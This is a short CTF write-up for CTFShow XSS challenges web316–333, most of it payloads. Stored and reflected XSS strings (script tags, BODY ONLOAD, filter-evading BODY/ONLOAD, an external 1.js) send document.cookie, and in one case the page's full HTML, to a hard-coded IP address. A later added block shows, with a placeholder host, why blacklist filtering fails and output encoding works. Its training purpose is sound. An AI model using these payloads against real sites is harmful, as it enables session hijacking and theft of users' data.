CTFShow-XSS

web316: send the cookie back to a VPS

<script>var img = document.createElement("img");img.src = "http://91.67.253.121:1234/?cookie="+document.cookie;alert(/success/);</script>

<script>window.open('http://91.67.253.121:1237/?cookie='+document.cookie)</script>

web317-319: a new trick

<BODY ONLOAD=document.location='http://91.67.253.121:1237?cookie='+document.cookie;>

web320: spaces are filtered

<BODY/ONLOAD=document.location='http://91.67.253.121:1237?cookie='+document.cookie;>
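
As an added example (not part of the original write-up): why the filtering in web317-320 fails as a defence, compared with output encoding. The blacklist in `naiveFilter` is an assumption modelled on the challenge notes; `escapeHtml`, `isExecutable`, `evaluate` and the `collector.example` host are hypothetical names used only for illustration.

```javascript
// Added example, not from the original write-up. All names are hypothetical.
const COLLECTOR = "http://collector.example:1237"; // placeholder host

// Payload shapes from this page, with the host replaced by the placeholder.
const samples = [
  `<script src="${COLLECTOR}/1.js"></script>`,
  `<BODY ONLOAD=document.location='${COLLECTOR}?cookie='+document.cookie;>`,
  `<BODY/ONLOAD=document.location='${COLLECTOR}?cookie='+document.cookie;>`,
];

// Assumed blacklist: drop <script> tags and all whitespace.
function naiveFilter(input) {
  return input.replace(/<\/?script[^>]*>/gi, "").replace(/\s+/g, "");
}

// Output encoding for HTML text and quoted attribute contexts.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// True if the string still holds a <script> tag or a tag with an on* handler.
function isExecutable(html) {
  return /<script[\s\/>]/i.test(html) || /<[a-z][^>]*[\s\/]on[a-z]+\s*=/i.test(html);
}

// Compare the same payload untouched, after the blacklist, and after encoding.
function evaluate(payload) {
  return {
    raw: isExecutable(payload),
    afterBlacklist: isExecutable(naiveFilter(payload)),
    afterEscaping: isExecutable(escapeHtml(payload)),
  };
}

for (const s of samples) console.log(JSON.stringify(evaluate(s)), s);
```

Setting `HttpOnly` on the session cookie keeps `document.cookie` from exposing it, but it does not stop a script that reads the page's HTML as in 329, so encoding on output remains the primary fix.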

328

The username field is vulnerable to XSS.

I tried several XSS platforms, but none of them seemed to be of much use.

<script src="http://91.67.253.121:1237/1.js"></script>

1.js

var img = new Image();
img.src = "http://91.67.253.121:1237/?cookie="+document.cookie;
document.body.append(img);

329

1.js

var img = new Image();
img.src = "http://91.67.253.121:1237/?cookie="+document.getElementsByTagName('html')[0].innerHTML;
document.body.append(img);
<script src="http://91.67.253.121:1237/1.js"></script>

This returns the entire HTML of the page; then find the flag in it.

332

333

Transfer money to yourself and run it with Burp.